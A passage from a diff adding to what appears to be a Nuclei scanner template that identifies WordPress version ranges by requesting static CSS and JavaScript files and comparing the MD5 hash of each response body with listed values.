== md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"edc3a1e5f58e31e00a8d3f8e0a6e636c\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"430c7bd2b88082d9d8518e961dcc0c36\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"0fd5180cf4dd696a5ddba82caec422bc\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"717c172fdbaa9843409c603ca7bf5850\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"b04f063afb472c3d7c9da4c252147d9e\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"feb003c2a47619ac633934cbed3a10b8\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"6e27243fb0ec55268be46392ed3f98a0\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"030e75d241af2af375a74fc49ad66837\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"237c08b52205d548726014723d043ece\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/admin-menu.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"1056f3272ebe83f13d5d3f86a82a77f4\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"611efcc5caad0f3085897836e4ce1f3b\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"a6f0b8d7e3d6fa68eb42118e6b3d3b57\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"4a22ae006903e377b68dc697fc0cc46a\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"92589674d68fa4fd88208767abfb29bd\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"b4f403367235a239a2b7e43997e91e65\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f86faa9e59a5c7d5d71b840bfc1bffdb\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"d17dc4b834c38295ee7d3fd3339eff8b\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e44f9547d3fbe824463c374e751384ec\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"64bf404fed71473984d2cd0eddef93e2\" == md5(body))" + - method: GET + path: + 
- "{{BaseURL}}/wp-admin/css/revisions.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"2311887a1e17b942de617ba70baeda36\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"c9797b3d827e091fda53c01f7131870b\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"336f89e33e253fec3b2e53b2af555c87\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"d266c3e67470bf8f70d91d920b1b50f1\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"e2cd66b3e286187e9d7e00d6436b6d36\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"1d0285dfab8cb53ddc0d294668edc8d1\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"df6537dea2d237c35f611cf2de200b6a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"e785a905651a0ec0cdb0b5843991eaae\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"b196971abc1abc7ea2cb4bc0a3ab7535\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d91c84783ccf8c7f179258952826f033\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e4c46395d986df5b5751711c6055f828\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"41615f8d0cbede34b5ced529fe9e5e7f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"944cd36ea235bb5195107a4df2ef8334\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2b0dee38c8e76f4bee6878104104f63c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/admin-menu-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"7834f756df7bcd9b6158cabefe10feb5\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"96086cb89251901ecd80597778deb208\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"e6cda1ba46e89d008f798c05a4e9570e\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"befeb689473b0bf189ec4a39ee920bcd\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - 
"(\"b483b39360a65b857ce7a566fb7825ae\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"abab055d551cb9c52c9d8d0b2a588451\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"cff3ee84962d5176ae88a2a3d64392ac\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"5ea1958d0718eca4ff1a039e3390764e\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"cf0c3b2d9d0d890d9babc90f363f85e9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"750a05ebf45d615b94c0942523b579d5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/server-side-render.min.js" + matchers: + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"655821377848fd385c27c38c37d61a07\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"bcdd60e8b18b524afcd85e5880b84c33\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5044b9325a347214c9f52754edffa4a0\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"fdce9089e12dd585e67f28317028a534\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/media-utils.min.js" + matchers: + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1b84cc0c2ee1b6b872e501d0dc0c7107\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"8730cf437a1617a3d774bcc9686746e3\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"25bfaeb77aca280dafcb30ef8fab62f5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5261f82d95f8dd51c4c82631d0661c2a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/media-utils.js" + matchers: + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"9766915643d7c7bf614e35b4121eefbd\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f91031ce517bb7e6bb0cdd139429a894\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"8356d9d46e55173927fb24ff5ec33d6e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e6c9ad652659f0fa8cd0893063da59d9\" == md5(body))" + - method: 
GET + path: + - "{{BaseURL}}/wp-includes/js/dist/server-side-render.js" + matchers: + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8001395726ac015e4c7e04846fbdaf67\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"7e256da1ed2ab582e23deb3d609a99c5\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9bb79c23d92ccb79a9ee2117e746e1dc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"1caaf0eecf4a874d07e07469f4dbfb56\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/privacy-tools.min.js" + matchers: + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c9bd456399000e52825a2a70165b9163\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"8467330290c25418a66f498d1eb2dbff\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d05fddf80bf5b83b0d2405ae30d64a5b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"068afb4a47bd50a2f7714c6c70735fd6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/privacy-tools.js" + matchers: + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"44714ea47fba8f5071cdecc00f7953f3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"67be42a8a198bae68f48d93072c98256\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"317d353064286735507b5e9345707249\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4e3acdfd3c994f71bbd24352da00eeb4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/inline-edit-post.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"99166cce46b47d0181263f9a8b630b33\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"4a86ff8375f6af6a1793f20fcdfbbffc\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"b920b259910fda3187d7669d3344bbe5\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"e3751de1470210ce39ef99ef70f598e5\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"72ed9f7c8543c820a198b27905f6b23d\" == 
md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"d959c635484426ce7f5044a74dc04224\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"8c56d38ee4c4c97d875fdbc20ac029dd\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"ed03381714c58f75507c8ce11afd8c50\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.33 + dsl: + - "(\"a58d848de37a14f15cd749e3b1f7baec\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"7b3e501ec7c14ac0847c594e02ff3cfa\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"ce5cd22ac555cbc5480519b1973fea37\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"aaab3e624de6193b961731c6be3c8c4b\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"d5cc5dfcade1038403083c43c0e0edb5\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"4653d09cb28e97a8d8f44400af863fae\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"df9a9fa1f5ae362e5566eb609203316e\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"772a837e054ef6820107fbc8f622ef94\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"e2b0b1b02f508015c9495d62d63e9111\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"50faf7bda2c48f21c2c541429518a371\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"830550348b2fcab412282a6f0415d67a\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"e5f05c023be52b6170f029a2c47ea0fb\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"9d57cc3de14e3597d49407ba21650a17\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"581ce00c1f81d6144ca03c4c913f106c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"53ce6b4e6ae287a145d4c6919a1337ab\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"40a44a54bbdf9b7e30bbf82278ec1142\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"310f82bdb9de9fce084a50495d3b9ba6\" == md5(body))" + 
- type: dsl + name: 5.6 + dsl: + - "(\"ef1095216e72a031f4697230a289698f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/tags-suggest.min.js" + matchers: + - type: dsl + name: 4.7.4 - 5.1.8 + dsl: + - "(\"b0e2e58bbcb8654f8f6c09726c8df7e8\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"5023f66fa980414e5177e9a6b29aff26\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d305434988f3f831e6f1883d4a750948\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"d9b22becd5790ce6250cf1388f73ce69\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"181ee51385ab5b269fc5058358ed3648\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9b583c7e26f46e775ba680e47bcb5594\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"96ede3a05eadc3faf83991ef0af63bff\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/api-fetch.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"f09de7c7aeb73fa3f8a1e53e6ff4b305\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"50516221babd83d0bf95ea4ecd5d58a0\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c5d94ec07709fba77643a6774d477a7b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"36a5d2e1b03d0efed47043e216c3d2f9\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c43ea46c5886fd155f2fd7994ce6310d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5e072b558117cc528e20274eda36d809\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/api-fetch.min.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"da6b492eec5e352193be733652fb3209\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"67515582038f82ad0b094aa5e0bc1dcd\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"e52101f853577a9ec8e7cb8137e33640\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - 
"(\"19ce453efbd74d06a81ec228ce1d5247\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0edb88ae670f70a377b6ef4eef223c60\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"32f22e45308fe3062b9f86b0fc710934\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/block-serialization-default-parser.min.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"1d585ce73cc724afa36727542a43ac97\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"acde1b98f59602f08ceb5fd36bd116de\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8aec553ccda8f9b035a814de6f28e029\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"18c4e388773b6895f69f94afba477dad\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"3cf7496ac98d8d4a80dbd992c88a2213\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"df9f83c7ab58ba1c731325ce127bf00f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/block-serialization-default-parser.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"7d8ad191246e8e6dea0203f73f8cc061\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"70b8c60b095f1d4eddeb602e80d7cb85\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"af4267c09a196d31e97cdd99c7eeebe9\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a9a86cca30847bf34025e2a4342b6af8\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"68a1d3d8f24e182f39bbe411c9ce2fdf\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ca2bf1e3d15250cb35bab844663c6e38\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/blob.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"e6c27ec1d6668699f712c56b4a819f4d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"cdd5db3c87800508f5e73210f76c4c88\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - 
"(\"58bfb37a8081b4eda6e024b135919aa3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b76f444fce3aa2ba000a9b2c1a50b381\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f12d56e6713d792b1245c9699d14f7a9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"35ce2c589e64f4e72999b2d6f8a9c39f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/blob.min.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"f8b9570fbad012216e0ad8a1ea84187e\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d4272a74803c18ece3799c135f196ab0\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"7034bef89a578a00a44d10809d7394a0\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"2984c649c84fffa8beb5ab6fe6c70ece\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"fafa70f30162fb34955b073cbb99f885\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b5a777b54fbdb90ff36aea7830fed7fa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/autop.min.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"a207f32426009dc93b26585ed42aee17\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"6284d2de63c7aee03f2278c7dc98356c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b7cd543a0b0cd07e45cd1bc25a638726\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"2e7ffbb6b277d278b6effac42f48f3c1\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"573ab119d54915cd9f53682769c50cf1\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"317b59ed97f57a1f932895e1906e6f32\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/autop.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"7ee01d53b8d7ab46463b64f64d504520\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"14123b164f7ad2487fa8e143d22ac143\" == md5(body))" + - type: dsl + name: 5.3 - 
5.3.6 + dsl: + - "(\"31e1f40e1156574c98fc4b0cf735857a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ff51ce763fa631677610fab1cb95aab1\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"676d8f976d7f2d5a14dd15bff63b288a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"450bf21d976c0b84b175f3578b865f4b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/list-reusable-blocks/style-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"d3835cf3e87d8764e8c9ba8e470af641\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"2cb783b7dd13ccb77d1eb4ac11141591\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8fc455cde485dbee10fb0d2d21a6e240\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e777f5e1e54a62909a9c667a857c8a06\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"761147c3559453c26dbbac541a1db6c0\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8828bb7def5a91617f8dc92ff1d54cb6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/list-reusable-blocks/style.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"690c76f64d35502bc7e4c367bb4efea4\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"02df3e2c9415c49b296e4a9142e3f385\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"51e05fb6e2cd8020f046629e1d214bdd\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"40b486615e5c5a7435a067a51b8e6c5c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"502c81a537b4ba42a46393bc5ff5115a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8a424a086235b9d27ce3aeb9a7d895ae\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/nux/style-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"9a5451d5e895048dffe2507330037cca\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - 
"(\"1fd071e6f21a55c48664fa01f510d3ff\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"067f1fa67dc68c39b293875357a49b0f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"39d93ff8fb552ad4b4f4a53c21b64aa4\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"548185fa04074d4d27d1df6afe60e4ef\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"01a78df6a74a122f060f9d09cce385f3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/nux/style.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"51e91a4aa751cd486eb1c5f4a90186f6\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"4cf6bdba8a45c4c95790ffba417b4095\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"acaea46a81c4c475aff738dbab35dea9\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3f96e5de3731e81e254ad0804005dbf3\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"00b6d9456f13d06dc8d7ea4455e37069\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"65c0141abc2fe9d9bba8b5331c3274ec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/keycodes.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"4922391431de20246f0ce7a2d74043ec\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"d398b8fab3582fd237c150f65310747e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"64ab87f3071718276127e84f59778fad\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"094e9a4938e3845babaf160eacb7d657\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"48fd05b4c2627f3d3a48cfb98ed91356\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"099b33475e54c64309e7b9a5ebb5d092\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"eb49fabbe0dc208ace2eca6d108a5a63\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"cedaabb320bb1e0328e3f6cd45b60574\" == md5(body))" + - 
method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/annotations.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"869b6589b93642d645a7ff94d34c9bcd\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"07e8500c949b1e53ed07759160193182\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1c8d75758692f38df662408bb0c46d13\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"54ba0b53e14340443743833e8b02af6f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"e1bc9760ad82c3b9169ecabe8b535bba\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"22df64d39c77eb46745305cc79a1f8d9\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9e8dafcf437caed1c7d4145d23d3027b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"44dafed8854af59b0c02f93f172c4760\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/nux.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"58ca84c8a9864a3dc873fdc4c453f48b\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"80332405c607e928fa6a16de140aa4c5\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"9916d74df1d25dc1cf23ee6645a1bb1f\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"b5b93be950c5d3a6e194e94cfdfbdcb5\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"4e0704461feab9e3bea09c010240945d\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"39e8386e44bce82d81d29c8782a86994\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6caa763feddc6018d9f1ec6dfabe82d8\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2b69996f7b611c2961e41f80bf5c0220\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/date.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"09bd7ec81cc275569f740ca0947d7090\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - 
"(\"5d459e25af93fd190cbe45fe0393622a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"fe68c7cfe0cd91ae976ee9f1c593b538\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"b43650e9707f46259c1588940adb3e0d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"3e8aefa8bd479feb0b73915bb0efa21b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"5456867a601e6e6d63593fa18e24c3ee\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c21f513f4347eddbecbd26ee92176d7f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9e15b9968669f4f270a564b7884e8193\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/date.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"d2afab5af40ed42065d752c7be23a055\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"95a892f98c25fe1f4b577bd187db7dbf\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d6ffddf9882e571a9552423efefb67e9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e72b12ad40beea703e88b1f147df141e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c3c7d67bf8ad5e0c9ea514bb97cd5e1a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ef68dcd75662d8a6186bb74a73a2dce1\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5ccc243c7115d389be5056139dcd625a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8b69d11c1ddd6302e78055ec64161814\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/annotations.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"157003fc3dac9012c20621ee1b7a0c12\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"16dd6bf7592ecc3334fcda83d2b9a7a5\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"dc558bf92a947005943cc5a6d86f65c9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"b2761292ae7b37b2535c41d776576e6f\" == 
